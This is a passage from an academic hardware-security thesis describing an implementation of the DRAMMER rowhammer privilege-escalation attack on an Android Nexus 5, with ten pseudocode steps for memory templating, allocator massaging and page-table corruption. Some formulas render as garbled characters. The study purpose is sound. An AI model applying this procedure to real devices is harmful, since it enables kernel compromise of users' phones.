ABI armeabi-v7a Table 15 Build properties for the device under attack

Information such as the Build Number and the ROM Build version is used to find the build files for the specific kernel in order to achieve more specific details necessary for the attack implementation. The modify kernel sources for the specific vendor and the MSM8994 SoC is Android 4.4.4_r2 (or kitkat-mr2.2-release) and references as android-msm-hammerhead-3.4- kitkat-mr2 [103]

 ION Heap IDs availability The ION heap declaration for the specific kernel has been found in the source code [103]. It describes the ION heaps available in the under attack mobile device allowing us to check if the attack can succeed on the specific build version. The file msm8974-ion.dtsi at the folder arch/arm/boot/dts contents the declaration of the ION heap IDs available and its type. We can see that include the declaration of the ION Heap 21 as SYSTEM CONTIG HEAP type. Then we can allocate contiguous physical blocks at the heap 21 and used to trigger the double-side rowhammer attack. qcom,ion-heap@21 { /* SYSTEM CONTIG HEAP */ reg = <21>; }; The countermeasures taken by Google on Android at new kernel versions try to protect kernel memory from double side rowhammer attacks by disabling the contiguous heap (kmalloc heap) at the system. This removes the possibility of allocating contiguous memory and to perform double-side rowhammer which reduces greatly the number of bits that can be flipped.

 Memory Information The buddy allocator manages the physical memory on Linux platforms, it prioritizes the smallest fitting block on each allocation as describes previews sections of this text (2.7). In order to reduce the internal fragmentation, the Slab allocation abstraction is implemented up of it. The Slab allocator aims to quickly serve allocations and deallocation request by organizing small objects in the number of slabs (page blocks) of commonly used sizes. The kernel groups the pages into the same contiguous region of memory (page blocks) to satisfy a high-order allocation.

97

The /proc/pagetypeinfo file from the proc file system provides detail information about the available memory pages on each zone. It shows eleven areas that correspond to the same order blocks for each memory zone division separately (Normal zone and High zone). Each area is divided into different migration types (Unmovable, Reclaimable, Movable, Reserve, CMA and Isolate). Each of the eleven areas represents the number of pages of a certain order which are available for each migrate type. The size in Bytes of the block for each column (each order) is: 2푂푟푑푒푟 × 푃퐴퐺퐸푆퐼푍퐸 (퐵푦푡푒푠) An example of the file structure is shown below in Figure 41.

Figure 41 /proc/pagetypeinfo kernel file information

 Virtual Memory Mapping The kernel source file arch/arm/include/asm/pgtable-2level.h [103] describes the specific slightly map implementation between the Linux page tables and the hardware ARM page tables for our specific hammerhead Android kernel. Linux is informed to have 2048 entries in the first level, each of which is 8 bytes that correspond with two hardware pointers to the second level. The second level contains two hardware PTE tables arranged contiguously, preceded by Linux versions which contain the state information Linux needs. Then, we end up with 512 entries in the second level for the specific case under study. Each process is able to have 2048 page tables

Figure 42 Page Table Layout Walk on Android ARM

98 entries at first level, each one will map 2MB memory blocks by trigger a maximum of 1024 Page Tables. Then each 2MB virtual memory will trigger a Page Table of 4KB size with the following layout Figure 42.

6.4.2 Drammer Attack Primitives The DRAMMER attack relies on the general memory management behaviour of the OS to perform the rowhammer attack primitives. We describe at this section the OS-specific behaviours exploiting for the implementation of each primitive.

 Fast Uncached Directly DRAM Access and Physical Memory addressing The Fast Uncached Directly DRAM primitive need to toggled fast enough the vulnerable row and implement a mechanism to access directly the RAM memory bypassing the cache. As has been discussing in previous sections (6.3.1) double-side rowhammer attack cover the first requirement by improving the effect on the vulnerable row. To implement double-side rowhammer it is necessary to have access to contiguous physical addresses block that allows hammering the rows above and below to the victim one. Both requirements, uncached directly access and physical memory addressing are achieved on the Android/ARM case, by using the DMA (Direct Memory Access) memory management mechanism provided by the OS. More specifically, we use the ION memory API in our attack implementation to reserve contiguous blocks of memory that are accessing directly from the DRAM memory over passing the cache. We allocate blocks from the ION heap ID 21 that represents the contiguous heap type on the specific kernel. The ION blocks are provided just from the Normal Zone of the physical memory at every migration type with the exception of CMA and Isolation types.

 Memory Massaging The Memory Massaging of the physical memory is necessary to land the sensitive data in the vulnerable location. We implement the Phys Feng Shui technique proposed in [2]. This technique relies on the predictable memory reuse patterns of the Buddy allocator to force the OS to serve memory from regions that we predict until places the target sensitive data, a Page Table in this case, on the vulnerable region. Also, we have to control the neighbour memory rows to the vulnerable one in order to be able to trigger the double-side rowhammer.

 Row size Detection The ARM specifications [93] [104] do not document memory details such as the rowsize. A timing- based side channel attack is proposed as a solution on [2] to determine the row size for a specific DRAM chip. This technique relies on the fact that the readings pages from different banks are faster than from the same bank (4.1.2.2). The row buffer of the bank must be refilled on each same bank access. Then, if we time measure between sequential access of contiguous physical pages we can find out the increase in the access time that corresponds to the same bank accesses. We must measure the time between a pair of access to pages n and n+i where i go from 0 to a large enough number of pages that guarantee that we have at least one access at the same bank. In practice for a typical PAGESIZE of 4KB is enough to check until 64 pages, for a maximum rowsize of 256KB.

99

The VUSec group [99] provides its open code to test whether an Android device is vulnerable to the Rowhammer bug [105]] and includes the rowsize.c library that implements the auto detect function for finding the rowsize. We include their module in our implementation to find out the rowsize of our system being 64KB.

6.4.3 DRAMMER Attack Implementation The DRAMMER attack initially requires memory templating by identifying the vulnerable regions of the physical memory (prone to induce flip bits). The second step is to massage the memory to place the sensitive data on a vulnerable physical region by using the Phys Feng Shui rowhammer technique. The Phys Feng Shui technique will be implemented in our attacks by forcing the buddy allocator to massage the memory in a predictable way. By tricking the system, we aim to place a Page Table at a specific vulnerable location in which we can reproduce the flip bit. Finally, the rowhammer must be triggered to corrupt the intended data and achieve write access permissions on the Page Table. Three types of physical contiguous blocks will be used in this process. The blocks of size M and L are allocated using the ION API for userspace at heap ID 21 to guarantee the allocation of contiguous physical memory (6.3.2). The ION API reserves blocks from the DMA zone which in the case of our device is available at the Normal zone (6.3.2). Large chunks Blocks L of size 4MB (The biggest contiguous block available) Medium chunks Blocks M of size 64KB (The ROWSIZE of the system 6.4.2) Small chunks Blocks S of size 4KB (The PAGESIZE of the System 6.4.2)

The blocks that contain the vulnerability are the vulnerable victim blocks and are referenced with the symbols L*, M* and S*.

 Step 1: Memory Template First of all, we need to template the memory by looking for possible rowhammer vulnerabilities until we discover the first exploitable bit flip. We exhaust all L blocks available in the memory on the ION heap 21 and keep it in the vector ion_chunks_L. Afterwards, we examine each L block looking for an exploitable flip bit. For each block, a row by row is being tested, excluding the first and the last ones because they lack possible above and below contiguous physical rows. The test triggers the rowhammer by accessing the aggressor’s above and below rows with a determined pattern one million times. Each pattern consists of specific values for the above_row, below_row and victim_row. On the example explained here we looking for 1-to-0 flip bit by setting the victim row with 1s and the above and below rows with 0s. This has been proven to be the template most likely to trigger vulnerabilities. In the implementation, we also check for the opposite direction flips, in case the DRAM cells in the mapped memory zone use opposite orientation. The next step is to check byte by byte the victim page looking for a 1-to-0 flip bit. If a flip is discovered a handling process is executed in order to gather information regarding the flip bit position at the block L. This specific information will help in reproducing the flip bit later. As the last step, the exploitability of the flip must be checked before continuing. The templating of the memory will continue until an exploitable flip bit has been found.

100

Step1 //Exhaust all the L blocks at the memory while(exist L available) chunk_L ← ION_alloc(L); add chunk_L to ion_chunks_L

//Templating for each chunk_L in ion_chunks_L for each row in block row_above ← all 0s; row_below ← all 0s; row_victim ← all 1s; for each page in row

//hammer victim for I = 1 to 1000000 *page_above *page_below

//check victim for each byte in page_victim if byte != all 1; handle_flip_bit() if check_exploitability() is true goto step2

The most important information keep it on the handle_flip_bit() are the below ones:  virt_ion_chunk_L*: Virtual address for the vulnerable L* chunk  virt_address: Virtual address for the vulnerable Byte  virt_row: Virtual address of the vulnerable row  virt_page: Virtual address of the vulnerable page  byte_index_in_row: The Index position of the vulnerable Byte at the Block L*  org_word: The victim word value before the flip bit  new_word: The victim word value whit the flip bit  flip_direction: The direction of the flip bit. Keep 1 for 1-to-0 flip and 0 for 0-to-1 flip

101

Figure 43 shows the victim L* block with the most important relative information regarding the flip bit. Note that L is allocated with an ION contiguous physical buffer which means, the virtual memory address contiguous represent also contiguous physical memory addresses.

Figure 43 Victim L* block and crucial information of the flip bit position. Aggressor rows in orange above and below the victim row.

Using the above information other crucial details can be calculated easily enabling the reproduction of the flip bit later on.  rel_address: The virtual address of the victim byte relative to the start of the L* chunk.

푟푒푙_푎푑푑푟푒푠푠 = 푣𝑖푟푡_푎푑푑푟푒푠푠 − 푣𝑖푟푡_𝑖표푛_푐ℎ푢푛푘_퐿*

 rel_row_index: Is the index position of the victim row at the victim L* chunk

푟푒푙_푎푑푑푟푒푠푠 푟푒푙_푟표푤_𝑖푛푑푒푥 = 푅푂푊푆퐼푍퐸

During the implementation of the exploit, we check the physical memory available at each step, by using the proc/pagetypeinzo kernel file, to make sure it has been successful. Figure 45 shows the available physical memory before exhausting the blocks of size L and Figure 44 shows the available physical memory at the end of the allocation. All the available L block (156 in the example) have been successfully allocated.

Figure 45 Available memory before of start the attack Figure 44 Available memory after exhausting L blocks

102

 Step 2: Memory Massaging – Exhaust M blocks At the start of the second step, we have found the victim L* chunk and we have exhausted all the biggest chunk blocks of size L of the physical memory. The next step of the Phys Feng Shui technique is exhausting all the M blocks available in the physical memory. Step2 //Exhaust all the M blocks at the memory while(exist M available) chunk_M ← ION_alloc(M); add chunk_M to ION_chunks_M

At the end of this step, the physical memory has no available blocks of size bigger than M. The actual available physical memory is shown in Figure 46. Notice that there is not any block available for DMA from orders 3 and upwards in the normal zone for the specific migration types.

Figure 46 Available memory after exhausting L and M blocks

 Step 3: Memory Massaging – Free the victim L* block The victim block L* that has been found in Step 1 is the target of our exploit. We release it to be available to the OS in order to force the allocation of the Page Table on it. The process of releasing the L* block will follow the procedure described at (6.3.2) section to free the ION buffer and delete the ION buffer descriptor. Figure 47 shows the availability of our L* block of size 4MB. Step3 //free the target block L* for each chunk_L in ion_chunks_L if chunk_L is L* free(chunk_L)

103

Figure 47 Available memory releasing the victim L* block

 Step 4: Memory Massaging – Exhaust Ms on L* In this step, we aim to allocate M blocks at the L* physical block that has been previously released. The L* block of size (4MB) can contain 64 M blocks of size (64KB). Notice that each of the M blocks will allocate one of the physical contiguous rows of the L* physical block Figure 48. Due to the predictable way that the buddy allocator fragments and reserves memory and the fact that L* contains physical contiguous memory we can be sure that the M allocations contain consecutive rows of L*. The buddy allocator will serve a row of L* for each of the M allocations request Figure 49. The relative index position of each row at L* corresponds to the index position of M blocks in the ION_chunks_M2 vector. Step4 //Exhaust all the M blocks at the memory while(exist M available) chunk_M ← ION_alloc(M); add chunk_M to ION_chunks_M2

Figure 48 Buddy allocator behaviour on the allocation of M blocks

104

Figure 49 Available memory after allocating M blocks on the L* location

 Step 5: Memory Massaging – Release the target M* block Of the 64 M blocks allocated we need to release the target M* block. The target M* block is the one that holds the exploitable flip bit. M* is the target block of 64 KB that refers to the target row. As we demonstrated in the previous steps the M blocks have been allocated contiguously, thus the target block M* have been accessed at the rel_row_index position of the vector ION_chunks_M2.

Step5 //free the target block M* free(ion_chunks_M2[rel_row_index])

As a result, our M* block is available at order 4, and all the memory blocks bigger than 64KB (order 4) are reserved (Figure 50).

Figure 50 Available memory after release the M* victim block

 Step 6: Memory Massaging - Avoid Low Memory conditions The Phys Feng Shui technique increases memory pressure which can put the system on Low Memory Condition and trigger the LKM and OOM mechanisms to decrease such pressure by freeing up unused memory in order to avoid a system crash. In preparation for the next allocation steps, the remaining L blocks must be freed to avoid the Low Memory Condition to not trigger memory cleanups.

105

Step6 //free the target block L* for each chunk_L in ion_chunks_L free(chunk_L)

We can see in Figure 51 that the only available block of order 4 (ROWSIZE) is the M* and the 155 available blocks of order 10 (4MB) that have just been released.

Figure 51 Available memory after releasing all the L blocks

 Step 7: Memory Massaging – Exhausted S blocks The goal is to place a target Page Table in the vulnerable M* block memory. We have to exhaust all the memory blocks under order 4 by allocating S (PAGESIZE) chunks to guarantee that subsequent allocations of PAGESIZE will fall in the vulnerable M* block. ION can only be used to allocate 16KB or larger chunks [2]. Alternatively, we will spread Page Tables by creating a tmp file of 2MB and repeatedly mapped every 2MB of the VM (Virtual Memory). Each Page Table can map 2MB of memory, thus by mapping the same file every 2MB of VM, indirectly we populate each time a new Page Table of 4KB size (6.3.2) which means a new S block will be reserved. Since the maximum number of Page Tables for each process is 1024, we need to create multiple child processes to allocate as many S blocks as needed. Firstly, we calculate the hypothetical number of S blocks needed to exhaust all the memory blocks of orders below 4 using the information at the /proc/pagetypeinfo file. Each child process will spread 500 Page Tables until 200 S blocks remain, which will be managed by the father process. Children processes will be kept alive until they receive a kill signal from the father process, in order to ensure that their allocated memory will not be released.

In Figure 53 the result of one child process after finishing its 500 PT spreads is shown. The Figure 52 shows the available physical memory to be managed by the father after the children have finished.

106

Step7 //Spreading Page Tables file_size ← 2MB tmp_file ← create(file_size) numS ← Number_of_S_Blocks_available children_num ← numS-200 maxPT ← 500 mem_offset ← 2MB for I=1 to children_num new ← fork(); count ← 0 if new is child address_map ← mem_offset for I=1 to (maxPT-1) mmap(address_map,file_size,tmp_file) address_map ← address_map + mem_offset trigger child_signal while (1) do if father_signal==1 break else while (1) do if father_signal==1 break

Figure 53 Available memory after a child spreading the PTs

Figure 52 Available memory let it to the father process

107

 Step 8: Memory Massaging – Spreading Target Page Tables In this section, we aim to improve the probability of the target Page Table to fall at the correct vulnerable position by making the father process spread such Page Tables that can be targeted. The target Page Table (PT) that falls into the vulnerable page must have a Page Table Entry (PTE) located at the vulnerable word that points a physical page p. The physical allocation of source p must be ퟐ퐧 physical contiguous pages apart of the PT allocated at the vulnerable position of M*. Then, flipping the n lowest bit position of the Base Address at the vulnerable PTE will make the PTE point to the vulnerable PT itself (Figure 54). If the flip_direction is 1-to-0 the p page must be placed ퟐ풏 pages apart on the right of vulnerable PT and on the left if the flip_direction is 0-to-1. Find out the physical location for p To identify where to locate the page p in the physical memory, first, we must determine the flip bit position at the PTE. The values to calculate are:  bit_index_in_word: The index position of the flip bit at the PTE.  bit_index_in_baseaddress: The index position of the flip bit at the base address. The value n gives us the pages apart from the vulnerable PT that we must place the source p.

Figure 54 Victim Page Table Entry format

The following is a numerical example for a real flip bit that is produced on our device. If the physical address of the vulnerable page is phys_page=0x301c000 and the bit_index_address=7 the physical location for the page p must be phys_source_page=0x309c00 (Figure 55).

Figure 55 Example of physical address of source p from the physical page of the target PT

We aim to find out the physical location to place p by using the virtual address knowledge previously obtained of the flip bit position at the contiguous block L* to guarantee the attack is independent of the user’s ability to access the virtual-to-physical address mapping. In order to achieve that we need to find out the following index in L* (Figure 56).

108

 target_pfn_row: The row index of the vulnerable row in the block L*. At this row, we aim to place our target PT. 푡푎푟푔푒푡_푝푓푛 푡푎푟푔푒푡_푝푓푛_푟표푤 = 푃퐴퐺퐸푆_푃퐸푅_푅푂푊  source_pfn_row: The row index of the source row in the block L*. At this row, we aim to place our source page p. 푠표푢푟푐푒_푝푓푛 푠표푢푟푐푒_푝푓푛_푟표푤 = 푃퐴퐺퐸푆_푃퐸푅_푅푂푊 Firstly, we must calculate the corresponding values:  target_pfn: The page index of the vulnerable page in the block L*. At this page, we aim to place our target PT. 푟푒푙_푎푑푑푟푒푠푠 푡푎푟푔푒푡_푝푓푛 = 푃퐴퐺퐸푆퐼푍퐸

 source_pfn: The page index of the source page in the block L*. At this page, we aim to place our source p. 푠표푢푟푐푒_푝푓푛 = 푋푂푅(푡푎푟푔푒푡_푝푓푛, 1 ≪ (푏𝑖푡_𝑖푛푑푒푥_in_푟표푤 − 12))

For our example:  virt_address=0x9051c906  virt_ion_chunk_L*=0x90500000 Then,  rel_address = 0x1c906  target_pfn = 28  source_pfn = 156  target_pfn_row = 1 (PAGES_PER_ROW=16)  source_pfn_row = 9 (PAGES_PER_ROW=16)

Figure 56 Relative positions of source page and target page in victim block L* The source_pfn_row and the target_pfn_row index on L* directly match to the index on the ION_chunks_M2 vector that points to the rows on M blocks forms. Then, we can conclude that

109 our page p must be allocated at our block M pointed at the target_pfn_row position of our vector (ION_chunks_M2[target_pfn_row]). Next, we need to find out the index of the page at the specific row in which we have to place the page p. For this purpose, we will calculate the following index:  target_page_index_in_row: The index of the vulnerable page on the vulnerable row. Index the specific page at target row in which we are expected to allocate the target PT by tricking the System.

푡푎푟푔푒푡_푝푎푔푒_𝑖푛푑푒푥_in_푟표푤 = 푡푎푟푔푒푡_푝푓푛 − (푡푎푟푔푒푡_푝푓푛_푟표푤 × 푃퐴퐺퐸푆_푃퐸푅_푅푂푊)

 source_page_index_in_row: The index of the source page on the source row. Index the specific page at the source row in which we need to allocate the source page p in physical memory.

푠표푢푟푐푒_푝푎푔푒_𝑖푛푑푒푥_in_푟표푤 = 푠표푢푟푐푒_푝푓푛 − (푠표푢푟푐푒_푝푓푛_푟표푤 ∗ 푃퐴퐺퐸푆_푃퐸푅_푅푂푊)

For our example:  target_page_index_in_row = 12 (PAGES_PER_ROW=16)  source_page_index_in_row = 12 (PAGES_PER_ROW=16)

Find out the virtual memory to map p The location of the PTE that points to p inside the target PT depends on the virtual address that maps the physical location of p. We must carefully select the VM address that allows us to align the PTE according to the vulnerable word location. At the vulnerable page (Victim page) found at step 1, we aim to place our target PT. The PT contains the target PTE which points to p placed at the vulnerable word (victim PTE). Each PT maps 2MB of physical memory and fits on one PAGESIZE according to the structure that has been explained at (6.3.2). As discussed earlier the first 2048 Bytes (512 words) contain the Linux Software Page table and the rest 2096 Bytes contain the physical Page Table (512 words) with 512 PTE. Each PTE points to one physical page (4KB) on a contiguous virtual memory block of 512 pages, 2MB of contiguous virtual memory will be mapped to discontiguous physical pages. In preparation of the VA memory to map p we divide the address for p (virt_source_address) into two parts: virt_source_address_base and virt_source_address_offset ( Figure 57):  virt_source_address_base: The base address for the VM address mapping p. For each different virt_source_address_base a new PT will be triggered.  virt_source_address_offset : The offset address for the VM address mapping p. For each different virt_source_address_offset a new PTE will be triggered on the same PT. The specific offset at the VA address will guarantee that the respective PTE fall in the word_index_in_PT location on the Physical PT part.

푣𝑖푟푡_푠표푢푟푐푒_푎푑푑푟푒푠푠_표푓푓푠푒푡 = 푤표푟푑_𝑖푛푑푒푥_in_푃푇 × PAGESIZE (Bytes)

110

Figure 57 Format of Virtual Address for source page p

For any different value in the 12 most significant bits designated by virt_source_address_base will trigger a new valid target PT. On the other hand, a specific value in the least significant 20 bits designated by virt_source_address_offset will guarantee that the PTE is placed in the correct position on the target PT. To find out the correct value we need to calculate the word_index_in_PT which is the vulnerable PTE index on the vulnerable physical PT (Figure 58).  Word_index_in_PT: The PTE index on the vulnerable physical PT. 푤표푟푑_𝑖푛푑푒푥_in_푝푎푔푒_푡푎푏푙푒 = 푤표푟푑_𝑖푛푑푒푥_in_푝푎푔푒- 512

 Word_index_in_page: The word index on the Victim Page 퐵푦푡푒_𝑖푛푑푒푥_in_푝푎푔푒 푤표푟푑_𝑖푛푑푒푥_in_푝푎푔푒 = 퐵푌푇퐸푆_푃퐸푅_푊푂푅퐷

Figure 58 Format of Target Page Table at vulnerable victim Page For the flip bit example study until now the corresponding values are the following ones:  Word_index_in_page = 577  Word_index_in_PT = 65  virt_source_address_offset = 0x41000

After we have gathered the necessary information regarding where to place the page p in physical memory, the specific M block, the specific page position inside M, and the VM (virt_source_address) to map p we are ready to spread as many target PTs as we need to exhaust all the S blocks available in the physical memory until one of them falls on the specific vulnerable

111 location (phys_page). In order to do that we need to map the physical page p to VA at a specific virt_source_address_offset every 2MB (mem_offset). Step8//Spreading target PT until fall on M* mem_offset ← 2MB address_map ← virt_source_address_offset+mem_offset fd ← ION_chunks_M2[target_pfn_row] fd_offset ← target_page_index_in_row*PAGESIZE length ← PAGESIZE numPT ← 0 while exist S in order < 4 do mmap(address_map,length,fd,fd_offset) address_map ← address_map + mem_offset numPT++

//Padding the PT inside of the block M* for i=0 to target_page_offset mmap(address_map, length,fd,fd_offset) address_map ← address_map + mem_offset numPT++

The original Phys Feng Shui theoretical strategy is to spread non-valid PT until one falls on the target M* block, then padding the PT inside the M* by spreading again a specific number of non- valid PT. When it is identified that the next PT will fall on the vulnerable location the target PT is triggered by mapping the source page p at a correct VM address. In our case, we choose the father to steer the last available S blocks with valid PT and padding with valid PT too. The decision is based on the practical observation that the allocator does not work in a completely predictable way in the reservation of the last available S blocks of size orders lower than 4. Because of that, whatever we could hypothetically determine by checking the proc file system when the allocation reaches the vulnerable region, in practice is not enough to be a guarantee. Our approach will improve the possibilities of a successful massaging by increasing the number of valid Page Tables spread across physical memory.

 Step 9: Double-side rowhammer the target PT Once we have selected and aligned the target PT at the vulnerable position, we perform the double-side rowhammer by accessing the pages above (virt_page_above) and below (virt_page_above) the target one (virt_page) and replicate the bit flip found in the template phase. The page above (virt_page_above) is located in the row above of the vulnerable one at the position target_page_index_in_row. Now we have the above aggressor row allocated in a block M accessible in the vector ION_chunks_M2 at position (target_pfn_row - 1). The page below (virt_page_below) is located at the row below of the vulnerable one at the position target_page_index_in_row. The aggressor below row is allocated in a block M accessible in the vector ION_chunks_M2 at position (target_pfn_row +1). In order to reproduce the vulnerability, we set the pages above and below with the same pattern use at the template phase (Figure 59).

112

Figure 59 Victim row and aggressors rows

Step9 // Double-side rowhammer target PT

ION_chunks_M2[target_pfn_row-1] ← all 0s; ION_chunks_M2[target_pfn_row+1] ← all 0s; virt_page_above ← ION_chunks_M2[target_pfn_row-1]+target_page_index_in_row*PAGESIZE virt_page_below ← ION_chunks_M2[target_pfn_row+1]+target_page_index_in_row*PAGESIZE for I = 1 to 1000000 *page_above *page_below

 Step 10: Check the success of the attack If we succeed in reproducing the desired flip bit, we gain write access to our page table as it is now mapped on our address space. To be able to verify if the attack was successful, we had set the physical page p with 1s. Since the same page p is mapped in all the VA locations from 2MB until the point when a valid target PT falls on the vulnerable location, we can access all the mapped VAs and check if any of them do not point to p anymore.

Step10 // Check the successfully mem_offset ← 2MB address_map ← virt_source_address_offset+mem_offset for I = 1 to numPT read(address_map) address_map ← address_map + mem_offset

6.4.4 Bit Flip exploitability The success of the attack relies upon the ability to find exploitable flip bits at the memory. The exploitability is determined by a combination of the number of flip bits found and the relative location of each flip in L* during the template phase. Note that so far we work with a single flip bit in a page to reduce complexity on the exploitability analysis and implementation. A flip bit is exploitable if it flips one of the lower bits of the base address part of a physical PTE in a PT. For 1-to-0 flip bit direction, a page p can be shifted at most the difference between the total page size of L* and the index page size of the vulnerable page on L*. For 0-to-1 flip bit

113 direction, a page p can be shifted at most the index page size of the vulnerable page on L*. This restriction will guarantee that without any access to physical addresses we could place the necessary source page p at a physical address that is ퟐ퐧 pages apart of the target PT, where n is the flip bit position at the base address. It also guarantees that the physical address belongs to the contiguous physical block L* and can be accessed from the M blocks under our control. By exploiting knowledge about relative offsets inside the L* chunk, we can easily predict for each flip bit if the flip can correspond to an exploitable position at the physical Page Table. Our ARMv7 Page Table type (6.3.2) enclose hardware PTE at the second half of the page then just flip bits on this part could be exploitable. Condition 1: word_index_in_PT > 0 Once we know that the flip bit falls at the second part of the page then we check if the flip bit will fall on a base address part of the PTE. Condition 2: bit_index_in_word < 12 Then we check if the flip bit is placed at enough low position at the base address. Note that on our implementation we contain 64 rows on each L* block (rows_on_L*=64). Condition 3: (source_pfn_row > 0) AND (source_pfn_row < rows_on_L*) Finally, we just need to make sure that the target and source page will not fall at the same row. This is necessary because all the target row need to be available on memory to can be allocated with the target PT. Condition 4: source_pfn_row != target_pfn_row

6.4.5 Evaluation Through the study of the practical implementation of our Android attack, based on the Phys_Feng_Shui technique we conclude that the attack is not so clearly deterministic as is being described hypothetically. The principal reason is that the kernel memory allocator does not behave in a totally deterministic way due to interferences from other activities in the system during the massaging phase. We have observed a frequent lock of memory blocks of sizes lower than 64KB at specific migration types such as reclaimable, movable and reserve types. This provokes the exhaust of S blocks to fail sometimes because the buddy allocator breaks the biggest blocks of size L instead of serving the memory from the available locked S blocks. We overpass the possible massaging issue by implementing a try and abort logic: if the massage step goes wrong just abort the process and try again until a success memory massaging is achieved allowing the target Page Table to fall at the vulnerable template location. In addition, we improve the probability of success by increasing the number of spreading valid target Page Tables, which increase the probabilities of one of them falling at the vulnerable location whenever the memory allocator behaves in an unexpected way. The exploitability of the template vulnerability is closely related to the specific map that the Linux kernel makes from the Software Page Table to the physical Page Table. In practice, this relation

114 depends on the source kernel which makes the attack implementation not directly portable on systems with different versions. Whatever many of the ARMv7 architecture-based kernels for mobile devices contain the same virtual mapped logic with the ones explained at this study.

115

7 CONCLUSION

The Electronic Engineering community performs research on the speed bump and voltage- binning with focus on system reliability. The product binning based on their characteristics require testing of each piece to determine its highest stable clock frequency and accompanying voltage and temperature while running. The tests aim to guarantee specific per cent of reliability on groups of products in terms of performance ranges by optimizing maximum yields without random failures. Attacks such as rowhammer bring new concerns to the Semiconductor manufacturing field. The reliability of the final product is related to the use of the IC inside the system, a malicious but legitimate input code cause a lousy behaviour in the DRAM IC. There is a need for research that faces the performance test of ICs, targeting not just reliability in terms of random failures but also in terms of the intentional ones. Aspects such as the identification of critical areas for crosstalk on silicon and the study of possible deterioration of critical paths by intentional causing transistor degradation have been already pointed as crucial in [106]. Rowhammer attacks have managed to break every form of isolation (4.4). It breaks process boundary to steal private information and breaks code integrity to gain root privileges, breaks the isolation between kernel and user on both x86 and ARM architectures, overpasses the inter- VM coexisting customer isolation on the cloud, and even breaks the isolation that protects the hypervisor from VM guests. Therefore, due Rowhammer attacks, memory isolation in terms of the software division of zones inside the same memory resources can be considered critically vulnerable, therefore it is necessary to make a detailed study of the possibilities to overpass trust zones trough rowhammer vulnerability when are based on shared RAM resources. Security solutions to defend systems against rowhammer attacks need to strike a balance between security and practicality. Many of the countermeasures proposed until the date incur unacceptable performance overhead or reduce the amount of available memory severely (sections 5.2 and 5.3). New attacks come out each year that overpass the existing defences and new system features are exploiting the vulnerability in different ways. The threat is especially serious for smartphones and tablets because of the inability to replace the memory chip of such devices considering current existing technology. The power consumption is a prime concern in the mobile world, which makes the hardware solutions such as higher DRAM refresh rate prohibitive in terms of increasing consumption. New effectively and hard to bypass software solution must be researched to reduce the exploitability of the vulnerability. From the analysis of vulnerability on the ARM architecture and our implementation process of the Android rowhammer attack, we are able to identify various research field directions to be explored in the future. It exists a need to study in more detail the role of the Slab allocator in memory management, to be able to implement a more deterministic android attack in a real environment. A deeper understanding of the behaviour of each hierarchy allocation level could help to understand the unexpected behaviour of the allocations in the massaging phase of the attack. Also, the development of a kernel module tool that dumps the physical allocation and the page table contents, could help to improve the probabilities of the attack on the specific system devices and achieve a better understanding of the memory allocation in a real environment.

116

Our check for rowhammer vulnerability on two LG Nexus 5 devices with identical HW and SW characteristics, highlighted interesting results. We were not able to trigger the rowhammer vulnerability on the new LG Nexus 5 terminal but we found plenty of flip bit at the old LG Nexus 5 device. The researchers at [60] probe that the rowhammer vulnerability in a device under test increases over a time-period. The fact that the number of flip bit increase with time could be related to memory degradation. We repeatedly performing double-side rowhammer in the same 4MB chunk of contiguous physical memory on the new LG Nexus 5 during days without achieving any flip bit. It will be especially interesting to follow the above research lines to determine the reasons that provoke the increase of the vulnerability over time. Our test shows that it may not be directly related to memory degradation through memory access. Future tests that target the study of the vulnerability under battery degradation conditions could bring some light to the issue. Notice that understands the reasons for the overtime degradation issue will help to understand better the vulnerability mechanism and to characterize in a more precise way the physical phenomena that involve.

117

8 APPENDIX 1: SIDE CHANNEL ATTACKS

Microarchitectural side-channel attacks exploit the operation performed in a computer architecture during software execution. Fundamentally, a computer architecture design aims at optimizing processing speed, thus computer architects have designed machines where processed data are strongly correlated with memory access and execution times. This data and code correlation acts as an exploitable side channel for Microarchitectural SCAs. Since the cache is strongly related to execution/processing time, has high granularity and is lacking any access restrictions, it constitutes an ideal focal point for Microarchitectural SCAs. Microarchitectural attacks are impervious to access boundaries established at the software level, so they can bypass many cyberattack application layer software countermeasure tools and have managed to be effective even against restrictive execution environments like Virtual Machines (VMs) [73] or ARM TrustZone [107]. The cache side-channel attacks are a kind of side-channel attacks that exploit timing differences between cache hits and cache misses and the cache eviction has ever been a means to perform it. There are three main techniques used for an attacker to determine which cache set is accessed by the victim. All of them work under the same logic: manipulate cache to a known state, wait for victim activity and examine what has changed:  In the EVICT and TIME technique, the attacker modifies a known cache set and observe the changes in the execution time of the victim’s operation [108].  In PRIME and PROVE, the attacker fills the cache with the known state before the execution of the victim process and observe the change in these cache states [108] [109]. If it is used on the last level cache enables cross-core cache attacks.  FLUSH and RELOAD exploits shared memory between attacker and victim and is very fine- grained. The attacker flushes the memory shared between the malicious process and the victim process using clflush instructions or cache eviction. After the victim process run the attacker measures the time to load memory into a register to determine if the memory has been accessed by the victim process [110] [111]. Furthermore, variations of the FLASH+RELOAD attack have been proposed for ARM-based systems thus providing strong implications of cache SCA vulnerabilities in ARM embedded systems (including embedded system nodes or Android-based mobile devices systems and ARM TrustZone Enabled processes) [107] [112]. At [107] is introduced cache storage side channel technique based on unexpected cache hit in cache incoherence.

118

9 ACKNOWLEDGEMENTS

First of all, I would like to thank Prof. Odysseas Koufopavlou, for giving me the opportunity to academically work on the hardware security field and allowing me the freedom to study it in depth. I would also like to thank Dr Apostolos Fournaris for this assistance and valuable contributions and coordination in my efforts through sharing his expertise in the hardware security field. Additionally, I would like to thank for helping me overcome issues regarding the DRAMMER implementation, Mr Victor Van der Veen of the VUSEC group on VU Amsterdam, the Netherlands. Finally, I would like to thank Dimitris Deyannis from FORTH in Greece for his contribution to my research regarding Linux kernel and cross-compiling.

119

120

10 BIBLIOGRAPHY

[1] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai and O. Mutlu, “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors,” IEEE, 2014.

[2] Van der Veen, V.; Fratantonio, Y.; Lindorfer, M.; Gruss, D.; Maurice, C.; Vigna, G.; Bos, H.; Razavi, K.; Giuffrida, C., “Drammer: Deterministic rowhammer attacks on mobile platforms,” in Proceedings of the 25th USENIX Security Sympoisium, Austin, TX, USA,, 10–12 August 2016.

[3] D. Gruss, C. Maurice and S. Mangard, “Rowhammer.js: A Remote Software-Induced Fault Attack in javaScript,” DIMVA, 2016.

